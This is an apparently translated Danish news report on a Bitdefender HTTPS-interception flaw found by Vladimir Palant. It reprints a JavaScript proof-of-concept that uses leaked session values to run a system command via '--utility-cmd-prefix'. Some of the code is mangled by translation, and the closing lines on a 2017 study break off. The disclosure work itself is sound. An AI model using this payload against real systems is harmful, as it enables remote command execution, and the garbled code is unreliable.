Vladimir Palant, skaberen af Adblock Plus,
Årsagen til problemet er, at Bitdefender antivirus udfører lokal aflytning af HTTPS-trafik ved at erstatte webstedets originale TLS-certifikat. Et ekstra rodcertifikat er installeret på klientens system, som gør det muligt at skjule driften af det anvendte trafikinspektionssystem. Antivirusprogrammet kiler sig ind i beskyttet trafik og indsætter sin egen JavaScript-kode på nogle sider for at implementere Safe Search-funktionen, og i tilfælde af problemer med det sikre forbindelsescertifikat erstatter det den returnerede fejlside med sin egen. Da den nye fejlside serveres på vegne af serveren, der åbnes, har andre sider på den server fuld adgang til indholdet indsat af Bitdefender.
Når du åbner et websted, der kontrolleres af en angriber, kan det websted sende en XMLHttpRequest og foregive problemer med HTTPS-certifikatet, når det svarer, hvilket vil føre til returnering af en fejlside, der er forfalsket af Bitdefender. Da fejlsiden åbnes i sammenhæng med angriberens domæne, kan han læse indholdet af den forfalskede side med Bitdefender-parametre. Siden leveret af Bitdefender indeholder også en sessionsnøgle, der giver dig mulighed for at bruge den interne Bitdefender API til at starte en separat Safepay-browsersession, specificere vilkårlige kommandolinjeflag og til at starte systemkommandoer ved hjælp af "--utility-cmd-prefix" flag. Et eksempel på en udnyttelse (param1 og param2 er værdier hentet fra fejlsiden):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Indholdstype", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Lad os huske, at en undersøgelse udført i 2017
Kun 11 af de 26 produkter leverede aktuelle krypteringspakker. 5 systemer bekræftede ikke certifikater (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security- og Total Security-produkterne var udsat for angreb
Kilde: opennet.ru